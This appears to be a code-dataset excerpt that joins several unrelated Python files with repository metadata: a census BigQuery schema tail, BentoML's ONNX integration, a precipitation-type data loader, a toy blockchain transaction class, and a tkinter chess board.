{"name": "rent_burden_not_computed", "type": "float", "mode": "nullable"},
{"name": "rent_over_50_percent", "type": "float", "mode": "nullable"},
{"name": "rent_under_10_percent", "type": "float", "mode": "nullable"},
{
"name": "renter_occupied_housing_units_paying_cash_median_gross_rent",
"type": "float",
"mode": "nullable",
},
{"name": "sales_office_employed", "type": "float", "mode": "nullable"},
{
"name": "some_college_and_associates_degree",
"type": "float",
"mode": "nullable",
},
{"name": "speak_only_english_at_home", "type": "float", "mode": "nullable"},
{"name": "speak_spanish_at_home", "type": "float", "mode": "nullable"},
{
"name": "speak_spanish_at_home_low_english",
"type": "float",
"mode": "nullable",
},
{"name": "three_cars", "type": "float", "mode": "nullable"},
{"name": "total_pop", "type": "float", "mode": "nullable"},
{"name": "two_cars", "type": "float", "mode": "nullable"},
{"name": "two_or_more_races_pop", "type": "float", "mode": "nullable"},
{
"name": "two_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_father_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_mother_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_not_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "unemployed_pop", "type": "float", "mode": "nullable"},
{"name": "vacant_housing_units", "type": "float", "mode": "nullable"},
{
"name": "vacant_housing_units_for_rent",
"type": "float",
"mode": "nullable",
},
{
"name": "vacant_housing_units_for_sale",
"type": "float",
"mode": "nullable",
},
{"name": "walked_to_work", "type": "float", "mode": "nullable"},
{"name": "white_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "white_male_45_54", "type": "float", "mode": "nullable"},
{"name": "white_male_55_64", "type": "float", "mode": "nullable"},
{"name": "white_pop", "type": "float", "mode": "nullable"},
{"name": "worked_at_home", "type": "float", "mode": "nullable"},
{"name": "workers_16_and_over", "type": "float", "mode": "nullable"},
],
)
place_2019_5yr_transform_csv >> load_place_2019_5yr_to_bq
| 61.832075
| 5,932
| 0.565225
|
4a0eb32f300b289b937194fa2307dcd6cf0f1a64
| 15,129
|
py
|
Python
|
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
import shutil
import typing as t
import logging
from typing import TYPE_CHECKING
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..types import PathType
from ..models import Model
from ..models import SAVE_NAMESPACE
from ..runner.utils import Params
from ..runner.utils import get_gpu_memory
from ..configuration.containers import BentoMLContainer
SUPPORTED_ONNX_BACKEND: t.List[str] = ["onnxruntime", "onnxruntime-gpu"]
ONNX_EXT: str = ".onnx"
try:
import onnx
import onnxruntime as ort
except ImportError:
raise MissingDependencyException(
"""\
`onnx` is required in order to use the module `bentoml.onnx`, do `pip install onnx`.
For more information, refers to https://onnx.ai/get-started.html
`onnxruntime` is also required by `bentoml.onnx`. Refer to https://onnxruntime.ai/ for
more information.
"""
)
if TYPE_CHECKING:
import numpy as np
import torch
from pandas.core.frame import DataFrame
from tensorflow.python.framework.ops import Tensor as TFTensor
from ..models import ModelStore
_ProviderType = t.List[t.Union[str, t.Tuple[str, t.Dict[str, t.Any]]]]
_GPUProviderType = t.List[
t.Tuple[
t.Literal["CUDAExecutionProvider"],
t.Union[t.Dict[str, t.Union[int, str, bool]], str],
]
]
# importlib.metadata is stdlib from Python 3.8; fall back to the PyPI backport.
try:
    import importlib.metadata as importlib_metadata
except ImportError:
    import importlib_metadata
_PACKAGE = ["onnxruntime", "onnxruntime-gpu"]
# Record the version of whichever onnxruntime flavour is installed; the first
# package found wins and the loop stops.
for p in _PACKAGE:
    try:
        _onnxruntime_version = importlib_metadata.version(p)
        break
    except importlib_metadata.PackageNotFoundError:
        pass
# NOTE(review): if neither onnxruntime flavour is installed,
# `_onnxruntime_version` is never bound and `save()` would raise NameError —
# though the `import onnxruntime` above would normally fail first.
_onnx_version = importlib_metadata.version("onnx")
MODULE_NAME = "bentoml.onnx"
logger = logging.getLogger(__name__)
# helper methods
def _yield_providers(
iterable: t.Sequence[t.Any],
) -> t.Generator[str, None, None]: # pragma: no cover
if isinstance(iterable, tuple):
yield iterable[0]
elif isinstance(iterable, str):
yield iterable
else:
yield from iterable
def flatten_list(lst: t.List[t.Any]) -> t.List[str]: # pragma: no cover
return [k for i in lst for k in _yield_providers(i)]
def _get_model_info(
    tag: t.Union[str, Tag],
    model_store: "ModelStore",
) -> t.Tuple["Model", str]:
    """Fetch a saved model from the store and resolve its on-disk ``.onnx`` path.

    Raises:
        BentoMLException: if the model was saved by a different framework module.
    """
    model = model_store.get(tag)
    # Accept models saved either under the public module name or this module.
    if model.info.module in (MODULE_NAME, __name__):
        return model, model.path_of(f"{SAVE_NAMESPACE}{ONNX_EXT}")
    raise BentoMLException(
        f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
    )
@inject
def load(
    tag: Tag,
    backend: t.Optional[str] = "onnxruntime",
    providers: t.Optional[t.Union["_ProviderType", "_GPUProviderType"]] = None,
    session_options: t.Optional["ort.SessionOptions"] = None,
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "ort.InferenceSession":
    """Load a saved ONNX model from the local modelstore as an InferenceSession.

    Args:
        tag: Tag of a saved model in the BentoML local modelstore.
        backend: ONNX runtime backend; one of ``onnxruntime`` /
            ``onnxruntime-gpu``.
        providers: Execution providers to use. Defaults to
            ``onnxruntime.get_available_providers()`` when not given.
        session_options: Optional ``onnxruntime.SessionOptions``.
        model_store: BentoML modelstore, provided by the DI container.

    Returns:
        an ``onnxruntime.InferenceSession`` for the stored model.

    Raises:
        BentoMLException: for an unsupported backend or unknown providers.
    """  # noqa
    _, model_file = _get_model_info(tag, model_store)

    if backend not in SUPPORTED_ONNX_BACKEND:
        raise BentoMLException(
            f"'{backend}' runtime is currently not supported for ONNXModel"
        )

    if providers:
        # Every requested provider must be one onnxruntime knows about.
        known = ort.get_all_providers()
        if any(p not in known for p in flatten_list(providers)):
            raise BentoMLException(f"'{providers}' cannot be parsed by `onnxruntime`")
    else:
        providers = ort.get_available_providers()

    return ort.InferenceSession(
        model_file, sess_options=session_options, providers=providers  # type: ignore[reportGeneralTypeIssues] # noqa: LN001
    )
@inject
def save(
    name: str,
    model: t.Union[onnx.ModelProto, PathType],
    *,
    metadata: t.Union[None, t.Dict[str, t.Any]] = None,
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
    """Save an ONNX model (in-memory proto or file path) to the modelstore.

    Args:
        name: Name for the saved model; must be a valid Python identifier.
        model: Either an ``onnx.ModelProto`` or a path to an ``.onnx`` file.
        metadata: Optional custom metadata to attach to the model.
        model_store: BentoML modelstore, provided by the DI container.

    Returns:
        The ``Tag`` (``name:version``) of the newly saved model.
    """  # noqa
    # Pin the exact framework versions so the model can be rebuilt later.
    context: t.Dict[str, t.Any] = {
        "framework_name": "onnx",
        "pip_dependencies": [
            f"onnx=={_onnx_version}",
            f"onnxruntime=={_onnxruntime_version}",
        ],
    }
    _model = Model.create(
        name,
        module=MODULE_NAME,
        metadata=metadata,
        context=context,
    )

    destination = _model.path_of(f"{SAVE_NAMESPACE}{ONNX_EXT}")
    if isinstance(model, onnx.ModelProto):
        # In-memory proto: serialize directly into the model directory.
        onnx.save_model(model, destination)
    else:
        # Path-like input: copy the existing file into the model directory.
        shutil.copyfile(model, destination)

    _model.save(model_store)
    return _model.tag
class _ONNXRunner(Runner):
    """Runner serving an ONNX model through an ``onnxruntime.InferenceSession``."""

    @inject
    def __init__(
        self,
        tag: Tag,
        backend: str,
        gpu_device_id: int,
        disable_copy_in_default_stream: bool,
        providers: t.Optional["_ProviderType"],
        session_options: t.Optional["ort.SessionOptions"],
        name: str,
        resource_quota: t.Optional[t.Dict[str, t.Any]],
        batch_options: t.Optional[t.Dict[str, t.Any]],
        model_store: "ModelStore",
    ):
        # gpu_device_id == -1 means CPU; any other value claims that GPU in
        # the resource quota so the base Runner schedules onto it.
        if gpu_device_id != -1:
            resource_quota = dict() if not resource_quota else resource_quota
            if "gpus" not in resource_quota:
                resource_quota["gpus"] = gpu_device_id
        super().__init__(name, resource_quota, batch_options)
        self._model_info, self._model_file = _get_model_info(tag, model_store)
        self._model_store = model_store
        self._backend = backend
        if backend not in SUPPORTED_ONNX_BACKEND:
            raise BentoMLException(
                f"'{backend}' runtime is currently not supported for ONNXModel"
            )
        if providers is not None:
            # Validate user-supplied providers against everything onnxruntime knows.
            if not all(i in ort.get_all_providers() for i in flatten_list(providers)):
                raise BentoMLException(
                    f"'{providers}' cannot be parsed by `onnxruntime`"
                )
        else:
            providers = self._get_default_providers(
                gpu_device_id, disable_copy_in_default_stream
            )
        self._providers = providers
        self._session_options = self._get_default_session_options(session_options)

    @staticmethod
    def _get_default_providers(
        gpu_device_id: int, disable_copy_in_default_stream: bool
    ) -> "_ProviderType":
        """Build the provider list: CUDA (capped to free GPU memory) + CPU fallback,
        or whatever onnxruntime reports available when running on CPU."""
        if gpu_device_id != -1:
            _, free = get_gpu_memory(gpu_device_id)
            gpu_ = {
                "device_id": gpu_device_id,
                "arena_extend_strategy": "kNextPowerOfTwo",
                "gpu_mem_limit": free,
                "cudnn_conv_algo_search": "EXHAUSTIVE",
                "do_copy_in_default_stream": True,
            }
            if disable_copy_in_default_stream:
                # Opting out of default-stream copies is a perf/correctness
                # trade-off; warn so the user makes it deliberately.
                logger.warning(
                    "`disable_copy_in_default_stream=True` will set `do_copy_in_default_stream=False`."
                    " There are race conditions and possibly better performance."
                )
                gpu_["do_copy_in_default_stream"] = False
            providers = [
                ("CUDAExecutionProvider", gpu_),
                "CPUExecutionProvider",
            ]
        else:
            providers = ort.get_available_providers()
        return providers  # type: ignore[return-value]

    def _get_default_session_options(
        self, session_options: t.Optional["ort.SessionOptions"]
    ) -> "ort.SessionOptions":
        """Return the user's session options unchanged, or build defaults sized
        to this runner's concurrency."""
        if session_options is not None:
            return session_options
        _session_options = ort.SessionOptions()
        _session_options.execution_mode = ort.ExecutionMode.ORT_PARALLEL
        _session_options.intra_op_num_threads = self.num_concurrency_per_replica
        _session_options.inter_op_num_threads = self.num_concurrency_per_replica
        _session_options.graph_optimization_level = (
            ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
        )
        return _session_options

    @property
    def required_models(self) -> t.List[Tag]:
        # The single model this runner depends on.
        return [self._model_info.tag]

    @property
    def num_concurrency_per_replica(self) -> int:
        # TODO: support GPU threads
        if self.resource_quota.on_gpu:
            return 1
        return int(round(self.resource_quota.cpu))

    @property
    def num_replica(self) -> int:
        # One replica per assigned GPU; a single replica on CPU.
        if self.resource_quota.on_gpu:
            return len(self.resource_quota.gpus)
        return 1

    # pylint: disable=arguments-differ,attribute-defined-outside-init
    def _setup(self) -> None:
        """Lazily create the InferenceSession inside the runner worker."""
        self._model = load(
            self._model_info.tag,
            backend=self._backend,
            providers=self._providers,
            session_options=self._session_options,
            model_store=self._model_store,
        )
        self._infer_func = getattr(self._model, "run")

    # pylint: disable=arguments-differ
    def _run_batch(  # type: ignore[reportIncompatibleMethodOverride]
        self,
        *args: t.Union[
            "np.ndarray[t.Any, np.dtype[t.Any]]",
            "DataFrame",
            "torch.Tensor",
            "TFTensor",
        ],
    ) -> t.Any:
        """Normalize each positional input to a numpy array and run inference.

        Inputs are matched positionally to the session's declared input names.
        """
        params = Params[
            t.Union[
                "torch.Tensor",
                "TFTensor",
                "np.ndarray[t.Any, np.dtype[t.Any]]",
                "DataFrame",
            ]
        ](*args)

        def _mapping(
            item: t.Union[
                "torch.Tensor",
                "TFTensor",
                "np.ndarray[t.Any, np.dtype[t.Any]]",
                "DataFrame",
            ]
        ) -> t.Any:
            # TODO: check if imported before actual eval
            import numpy as np
            import torch
            import pandas as pd
            import tensorflow as tf

            # Convert to a numpy array; ndarrays are cast to float32.
            # NOTE(review): tensors/DataFrames are NOT cast to float32 here,
            # only raw ndarrays are — confirm this asymmetry is intended.
            if isinstance(item, np.ndarray):
                item = item.astype(np.float32)
            elif isinstance(item, pd.DataFrame):
                item = item.to_numpy()
            elif isinstance(item, (tf.Tensor, torch.Tensor)):
                item = item.numpy()
            else:
                raise TypeError(
                    f"`_run_batch` of {self.__class__.__name__} only takes "
                    "`numpy.ndarray` or `pd.DataFrame` as input parameters"
                )
            return item

        params = params.map(_mapping)
        # Pair inputs positionally with the model's declared input names.
        input_names = {
            i.name: val for i, val in zip(self._model.get_inputs(), params.args)
        }
        output_names = [_.name for _ in self._model.get_outputs()]
        return self._infer_func(output_names, input_names)
@inject
def load_runner(
    tag: t.Union[str, Tag],
    *,
    backend: str = "onnxruntime",
    gpu_device_id: int = -1,
    disable_copy_in_default_stream: bool = False,
    providers: t.Optional["_ProviderType"] = None,
    session_options: t.Optional["ort.SessionOptions"] = None,
    name: t.Optional[str] = None,
    resource_quota: t.Optional[t.Dict[str, t.Any]] = None,
    batch_options: t.Optional[t.Dict[str, t.Any]] = None,
    model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "_ONNXRunner":
    """Create a Runner wrapping an ONNX model for the BentoML runtime.

    A Runner is a unit of serving logic that can be scaled horizontally to
    maximize throughput.

    Args:
        tag: Model tag (or ``name:version`` string) in the modelstore.
        backend: ONNX backend; ``onnxruntime`` or ``onnxruntime-gpu``.
        gpu_device_id: CUDA device ID; ``-1`` means CPU.
        disable_copy_in_default_stream: See the onnxruntime CUDA provider's
            ``do_copy_in_default_stream`` option.
        providers: Execution providers; defaults are chosen per device.
        session_options: Optional ``onnxruntime.SessionOptions``.
        name: Runner name; defaults to the tag's name.
        resource_quota: Resource allocation configuration for the runner.
        batch_options: Batching configuration for the runner.
        model_store: BentoML modelstore, provided by the DI container.

    Returns:
        a ``_ONNXRunner`` instance for the tagged model.
    """  # noqa
    tag = Tag.from_taglike(tag)
    # Default the runner name to the model's name.
    runner_name = tag.name if name is None else name
    return _ONNXRunner(
        tag=tag,
        backend=backend,
        gpu_device_id=gpu_device_id,
        disable_copy_in_default_stream=disable_copy_in_default_stream,
        providers=providers,
        session_options=session_options,
        name=runner_name,
        resource_quota=resource_quota,
        batch_options=batch_options,
        model_store=model_store,
    )
| 35.348131
| 124
| 0.635468
|
4a0eb3ba254d832be2daee09e391303a5acfc4ac
| 4,073
|
py
|
Python
|
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
import os
import random
import numpy as np
import pandas as pd
from tqdm import tqdm
from sklearn.preprocessing import StandardScaler, MinMaxScaler,\
OneHotEncoder, LabelEncoder
def load_ptype_data(data_path, source, train_start='20130101', train_end='20181108',
                    val_start='20181109', val_end='20200909',
                    test_start='20200910', test_end='20210501'):
    """
    Load precip-type parquet files and bucket them into train/val/test splits.

    Filenames are expected to embed a yyyymmdd date at positions [-16:-8]
    and follow the pattern ``{source}_rap_{date}.parquet``.

    Args:
        data_path (str): Path to data
        source (str): Precip observation source. Supports 'ASOS' or 'mPING'.
        train_start (str): Train split start date (format yyyymmdd).
        train_end (str): Train split end date (format yyyymmdd).
        val_start (str): Valid split start date (format yyyymmdd).
        val_end (str): Valid split end date (format yyyymmdd).
        test_start (str): Test split start date (format yyyymmdd).
        test_end (str): Test split end date (format yyyymmdd).
    Returns:
        Dictionary of Pandas dataframes of training / validation / test data
    """
    dates = sorted(fname[-16:-8] for fname in os.listdir(data_path))
    bounds = {
        'train': (train_start, train_end),
        'val': (val_start, val_end),
        'test': (test_start, test_end),
    }
    data = {}
    for split, (start, end) in bounds.items():
        # Inclusive date window for this split.
        split_dates = dates[dates.index(start) : dates.index(end) + 1]
        frames = [
            pd.read_parquet(os.path.join(data_path, f"{source}_rap_{d}.parquet"))
            for d in tqdm(split_dates, desc=f"{split}")
        ]
        data[split] = pd.concat(frames, ignore_index=True)
    return data
def preprocess_data(data, input_features, output_features, scaler_type="standard", encoder_type="onehot"):
    """
    Select features and scale data for ML.

    Args:
        data: Dictionary of dataframes with keys "train", "val" and "test".
        input_features (list): Input feature column names.
        output_features (list or str): Output feature column name(s); only the
            first entry is used as the label column.
        scaler_type: Type of scaling to perform (supports "standard" and "minmax")
        encoder_type: Type of encoder to perform (supports "label" and "onehot")
    Returns:
        Dictionary of scaled and one-hot encoded data, dictionary of scaler objects
    """
    scaler_classes = {"minmax": MinMaxScaler, "standard": StandardScaler}
    scalers, scaled_data = {}, {}

    # Fit the input scaler on the training split only, then apply it to all
    # splits, so validation/test statistics never leak into training.
    scalers["input"] = scaler_classes[scaler_type]()
    scaled_data["train_x"] = pd.DataFrame(
        scalers["input"].fit_transform(data["train"][input_features]),
        columns=input_features)
    for split in ("val", "test"):
        scaled_data[f"{split}_x"] = pd.DataFrame(
            scalers["input"].transform(data[split][input_features]),
            columns=input_features)

    # BUG FIX: the label column is now taken from `output_features` instead of
    # being hard-coded to 'precip' (the parameter was previously ignored).
    if isinstance(output_features, str):
        output_col = output_features
    else:
        output_col = output_features[0]

    label_encoder = LabelEncoder()
    scaled_data["train_y"] = label_encoder.fit_transform(data["train"][output_col])
    scaled_data["val_y"] = label_encoder.transform(data["val"][output_col])
    scaled_data["test_y"] = label_encoder.transform(data["test"][output_col])
    scalers["output"] = label_encoder

    if encoder_type == "onehot":
        # NOTE: as in the original, the one-hot encoder replaces the label
        # encoder in `scalers["output"]`, so the label mapping is not returned.
        onehot = OneHotEncoder(sparse=False)
        for split in ("train", "val", "test"):
            labels = scaled_data[f"{split}_y"].reshape(-1, 1)
            if split == "train":
                scaled_data[f"{split}_y"] = onehot.fit_transform(labels)
            else:
                scaled_data[f"{split}_y"] = onehot.transform(labels)
        scalers["output"] = onehot

    return scaled_data, scalers
def reshape_data_1dCNN(data, base_variables=['TEMP_C', 'T_DEWPOINT_C', 'UGRD_m/s', 'VGRD_m/s'], n_levels=67):
    """Stack per-level profile columns into a (samples, levels, variables) float32 array.

    For each base variable, every column whose name contains that variable is
    treated as one vertical level, in column order.
    """
    out = np.zeros((data.shape[0], n_levels, len(base_variables)), dtype='float32')
    all_columns = list(data.columns)
    for var_idx, var in enumerate(base_variables):
        # Columns belonging to this variable's vertical profile.
        level_cols = [col for col in all_columns if var in col]
        out[:, :, var_idx] = data[level_cols].values.astype('float32')
    return out
| 47.360465
| 128
| 0.656764
|
4a0eb43295e4b66b6a9ee8233f1633e4b578f9cb
| 1,059
|
py
|
Python
|
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | 2
|
2021-03-15T12:38:18.000Z
|
2021-06-16T17:44:42.000Z
|
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | null | null | null |
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | 1
|
2018-09-28T19:08:58.000Z
|
2018-09-28T19:08:58.000Z
|
"""
Transaction Class
List of Transaction objects will be added to one Block.
Author: Rajat Gupta
Email: rajat15101@iiitnr.edu.in
Time & Date: 11:28 hrs, Sat, 3rd March 2018
"""
from datetime import datetime
class Transaction(object):
    """A single transaction between two clients on the network.

    Clients in this network are not miners/verifiers.  This is the base
    transaction type; subclass it to extend for a specific use case.
    """

    def __init__(self, to_, from_, qty=1, name=None):
        # The timestamp is captured once, at creation time, as a string.
        self.timestamp = str(datetime.now())
        self.to_ = to_
        self.from_ = from_
        self.qty = qty
        self.name = name
        # Unsigned until a signature is attached by the owner.
        self.digital_signature = None

    def __str__(self):
        return 'Candidate : ' + str(self.name) + ', Digital Signature : ' + str(self.digital_signature)

    def get_who(self):
        """Return the sender's address."""
        return self.from_

    def get_candidate(self):
        """Return the candidate name attached to this transaction."""
        return self.name

    def get_add(self):
        """Return the sender's address (alias of get_who)."""
        return self.from_
| 21.18
| 103
| 0.650614
|
4a0eb445dcd04e887a1482f6782f43e2336704e1
| 11,705
|
py
|
Python
|
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | null | null | null |
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | null | null | null |
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | 1
|
2021-08-01T01:24:47.000Z
|
2021-08-01T01:24:47.000Z
|
import tkinter as tk
from PIL import Image, ImageTk
import chesspieces as cp
#font details
font, text_margin = ("Veranda", 20), 5
primary_color = "tan"
secondary_color = "SpringGreen4"
class ChessBoard(tk.Canvas):
    """Interactive chess board drawn on a tkinter Canvas.

    ``pattern`` is a FEN-like piece-placement string ("rnbqkbnr/..." with
    digits standing for runs of empty squares).  Lowercase letters are black
    pieces, uppercase are white.
    """

    def __init__(self, root, pattern = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR"):
        # Board edge length: fit the window, rounded to a multiple of 8 and
        # clamped to 640..1280 px.
        self.size = min(max(min(int(root.winfo_width()/8), int(root.winfo_height()/8)) * 8, 640), 1280)
        self.space_width = self.size / 8
        self.root = root
        tk.Canvas.__init__(self, root, width = self.size, height = self.size)
        self.pack()
        # Kings tracked per color key ("w"/"b") for check detection.
        self.kings = {
            "w" : [],
            "b" : []
        }
        self.draw()
        self.start(pattern)
        root.bind("<Motion>", self.hover)
        self.selected = None
        root.bind("<Button-1>", self.move)

    def draw(self):
        """Draw the 8x8 checkered grid plus rank numbers and file letters."""
        for x in range(8):
            for y in range(8):
                self.create_rectangle(x*self.space_width, y*self.space_width, (x+1)*self.space_width, (y+1)*self.space_width,
                    fill = secondary_color if (x % 2) - (y % 2) else primary_color)
                if not x:
                    # Rank label down the left edge, contrasting with its square.
                    self.create_text(text_margin, (y*self.space_width) + text_margin, anchor = tk.NW,
                        fill = primary_color if y % 2 else secondary_color, font = font, text = y + 1, tags = "labels")
            # File letter (a-h) along the bottom edge.
            self.create_text((x + 1)*self.space_width - text_margin, 8*self.space_width - text_margin, anchor = tk.SE,
                fill = secondary_color if x % 2 else primary_color, font = font, text = chr(x + 97), tags ="labels")

    def start(self, pattern):
        """Populate self.board (8 rows of piece objects / "" for empty) from
        the FEN-like placement string and instantiate the piece objects."""
        x,y = 0,0
        self.board = [[] for i in range(8)]
        for i in pattern:
            if i == "/":
                x = 0
                y += 1
                continue
            if i.isnumeric():
                # NOTE(review): the inner loop shadows `i` (the digit char)
                # with 0..d-1, so `int(i) + 1` below equals d only because the
                # last loop value is d-1 — correct, but fragile.
                for i in range(int(i)):
                    self.board[y].append("")
                x += int(i) + 1
                continue
            i_val = ord(i)
            # Lowercase letters (ord >= 97) are black pieces.
            color = "black" if i_val > 97 else "white"
            i = i.lower()
            if i == "p": self.board[y].append(cp.Pawn(self, (x,y), color))
            if i == "r": self.board[y].append(cp.Rook(self, (x,y), color))
            if i == "n": self.board[y].append(cp.Knight(self, (x,y), color))
            if i == "b": self.board[y].append(cp.Bishop(self, (x,y), color))
            if i == "q": self.board[y].append(cp.Queen(self, (x,y), color))
            if i == "k":
                self.board[y].append(cp.King(self, (x,y), color))
                self.kings[color[0]].append(self.board[y][-1])
            x += 1

    def get_board(self):
        """Serialize self.board back into a FEN-like placement string.

        NOTE(review): the empty-square count is only appended after the inner
        x-loop finishes, and is never reset, so rows where empty squares
        precede pieces serialize incorrectly (count should be flushed before
        each piece letter).
        """
        board = ""
        for y in range(8):
            count = 0
            for x in range(8):
                if not self.board[y][x]:
                    count += 1
                    continue
                else:
                    space = self.board[y][x]
                    if isinstance(space, cp.Pawn):
                        new_letter = "p"
                    if isinstance(space, cp.Rook):
                        new_letter = "r"
                    if isinstance(space, cp.Knight):
                        new_letter = "n"
                    if isinstance(space, cp.Bishop):
                        new_letter = "b"
                    if isinstance(space, cp.Queen):
                        new_letter = "q"
                    if isinstance(space, cp.King):
                        new_letter = "k"
                    if space.color == "white":
                        new_letter = new_letter.upper()
                    board = board + new_letter
            if count != 0: board = board + str(count)
            board = board + "/"
        return board

    def hover(self, e):
        """Highlight the hovered piece (red) and its legal moves (green)."""
        self.root.update()
        # Pointer position relative to the canvas, converted to board coords.
        px = self.root.winfo_pointerx() - self.winfo_rootx()
        py = self.root.winfo_pointery() - self.winfo_rooty()
        x, y = int(px / self.space_width), int(py / self.space_width)
        self.delete("moves")
        self.moves = []
        if not 0 <= x <= 7 or not 0 <= y <= 7: return
        margin = 10
        if self.board[y][x]:
            self.create_rectangle(x*self.space_width + margin, y*self.space_width + margin,
                (x+1)*self.space_width - margin, (y+1)*self.space_width - margin,
                tags = "moves", fill = "red")
            self.moves = self.board[y][x].find_moves()
            for i in self.moves:
                self.create_rectangle(i[0]*self.space_width + margin, i[1]*self.space_width + margin,
                    (i[0]+1)*self.space_width - margin, (i[1]+1)*self.space_width - margin,
                    tags = "moves", fill = "green")
        # Keep labels and piece sprites above the highlight rectangles.
        self.tag_raise("labels")
        self.tag_raise("pieces")

    def move(self, e):
        """First click: select the clicked piece and rebind events so the next
        click places it (place_piece) and Escape cancels (reset_click)."""
        self.root.update()
        px = self.root.winfo_pointerx() - self.winfo_rootx()
        py = self.root.winfo_pointery() - self.winfo_rooty()
        x, y = int(px / self.space_width), int(py / self.space_width)
        self.delete("select")
        if not 0 <= x <= 7 or not 0 <= y <= 7: return
        margin = 10
        if self.board[y][x]:
            self.create_rectangle(x*self.space_width + margin, y*self.space_width + margin,
                (x+1)*self.space_width - margin, (y+1)*self.space_width - margin,
                tags = "select", fill = "blue")
            self.root.unbind("<Motion>")
            self.root.unbind("<Button-1>")
            self.root.bind("<Button-1>", self.place_piece)
            self.root.bind("<Escape>", self.reset_click)
            self.selected = [x, y]
        self.tag_raise("labels")
        self.tag_raise("pieces")

    def place_piece(self, e):
        """Second click: move the selected piece to the clicked square if that
        square is in the piece's legal-move list, handling pawn en passant."""
        self.root.update()
        px = self.root.winfo_pointerx() - self.winfo_rootx()
        py = self.root.winfo_pointery() - self.winfo_rooty()
        x, y = int(px / self.space_width), int(py / self.space_width)
        if isinstance(self.selected, list) and 0 <= x <= 7 and 0 <= y <= 7:
            if [x, y] in self.moves:
                if isinstance(self.board[self.selected[1]][self.selected[0]], cp.Pawn):
                    # En-passant-style capture check for diagonal pawn moves.
                    if 0<=y + self.board[self.selected[1]][self.selected[0]].direction<=7 and x != self.selected[0]:
                        # NOTE(review): when the target square is empty,
                        # `self.board[y][x].color` is evaluated on "" and
                        # raises AttributeError — the condition order looks
                        # wrong; confirm intended en passant logic.
                        if (not self.board[y][x] and isinstance(self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x], cp.Pawn)
                            and self.board[y][x].color != self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x].color):
                            self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x].delete()
                            self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x] = ""
                    self.board[self.selected[1]][self.selected[0]].moved += 1
                # Capture any piece on the destination, then relocate.
                if self.board[y][x]:self.board[y][x].delete()
                self.board[y][x] = self.board[self.selected[1]][self.selected[0]]
                self.board[y][x].move((x,y))
                self.board[self.selected[1]][self.selected[0]] = ""
        self.reset_click(e)
        self.delete("moves")
        # NOTE(review): tag "selected" is never created anywhere (the
        # selection rectangle uses tag "select"); this delete looks like a
        # typo and is a no-op.
        self.delete("selected")

    def reset_click(self, e):
        """Cancel the current selection and restore hover/select bindings."""
        self.delete("select")
        self.selected = None
        self.root.bind("<Motion>", self.hover)
        self.root.bind("<Button-1>", self.move)

    def is_occupied(self, *args):
        """Return the board entry for a square given as (x, y) pair, a single
        flat 0-63 index, or two ints; False if the arguments don't match."""
        if isinstance(args[0], list) or isinstance(args[0], set) or isinstance(args[0], tuple):
            return self.board[args[0][1]][args[0][0]]
        if len(args) == 1 and isinstance(args[0], int):
            return self.board[int(args[0] / 8)][args[0] % 8]
        elif len(args) >= 2:
            if isinstance(args[0], int) and isinstance(args[1], int):
                return self.board[args[1]][args[0]]
        return False

    def check_for_check(self, board, color):
        """True if any of `color`'s kings is attacked on `board`.

        NOTE(review): get_legals returns move coordinates while self.kings
        holds King piece objects — confirm `i in moves` compares the intended
        types.
        """
        moves = self.get_legals(board, "black" if color == "white" else "white")
        for i in self.kings[color[0]]:
            if i in moves: return True

    def get_legals(self, board, color):
        """Collect every move available to `color`'s pieces on `board`."""
        moves = []
        for y in board:
            for x in y:
                if x:
                    if x.color[0] == color[0]:
                        for i in x.find_moves(False):
                            moves.append(i)
        return moves
class QuickBoard(tk.Canvas):
    """Static (non-interactive) board that renders piece sprites from a
    FEN-like placement string; no event bindings or move logic."""

